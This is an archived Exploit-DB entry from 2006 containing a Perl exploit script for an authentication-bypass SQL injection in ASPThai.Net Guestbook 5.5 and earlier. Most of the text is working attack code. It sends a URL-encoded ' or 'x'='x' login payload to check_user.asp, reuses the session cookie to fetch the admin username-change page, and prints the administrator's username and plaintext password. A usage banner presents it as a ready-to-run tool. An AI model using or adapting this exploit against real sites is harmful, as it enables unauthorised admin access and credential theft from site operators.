ASPThai.Net Guestbook <= 5.5 Auth Bypass SQL Injection Exploit

2006-02-06T00:00:00
ID EDB-ID:1472
Type exploitdb
Reporter Zodiac
Modified 2006-02-06T00:00:00

Description

ASPThai.Net Guestbook <= 5.5 (Auth Bypass) SQL Injection Exploit. Webapps exploit for asp platform

                                        
                                            #!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook &lt;= 5.5  
#(And possible higher could not find a site to test it on)
# This exploit shows the username of the administrator and the password In plain text
# Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# http://exploitercode.com/ http://www.g00ns.net 
#irc.g00ns.net #g00ns  email = zodiac@g00ns.net
#(c) 2006

use LWP::UserAgent;
use HTTP::Cookies;

$Server = $ARGV[0];

if($Server =~m/http/g)
{
$Server=~ 'http://$Server';
print 
}
else {
  print $error;
}

if(!$Server) {usage();exit() ;}

head();

print "\r\nGrabbing Username And Password\r\n\n";

#Login's and stores a cookie to view admin panel later


 $xpl = LWP::UserAgent-&gt;new() or die;
 $cookie_jar = HTTP::Cookies-&gt;new();

 $xpl-&gt;agent('g00ns');
 $xpl-&gt;cookie_jar($cookie_jar);

 $res = $xpl-&gt;post(
 $Server.'check_user.asp',
 Content =&gt; [ 

	'txtUserName' =&gt; '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', 
	'txtUserPass' =&gt; '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
	'Submit' =&gt; '-= Login =-',
 ],
 );

# Create a request
my $req = HTTP::Request-&gt;new(GET =&gt; 

$Server.'change_admin_username.asp'

);

$req-&gt;header('Referer', $Server.'admin_menu.asp');

my $res = $xpl-&gt;request($req);

$info= $res-&gt;content;

if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) 
{ 
 die "Error Connecting...\r\n"; 
}

#Check the outcome of the response

$info=~m/(value=\")(\n+|\w+|\W+)/g;
$User = $2;
$info=~m/(value=\")(\n+|\w+|\W+)/g;
$Pass= $2;

print "UserName:$User\r\nPassword:$Pass\r\n";

sub head()
 {
 print "\n=======================================================================\r\n";
 print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n";   
 print "=======================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: Thaisql.pl &lt;Site&gt;  \r\n\n";
 print " &lt;Site&gt; - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
 print "=======================================================================\r\n";
 print "   -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
 print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
 print "=======================================================================\r\n";

# milw0rm.com [2006-02-06]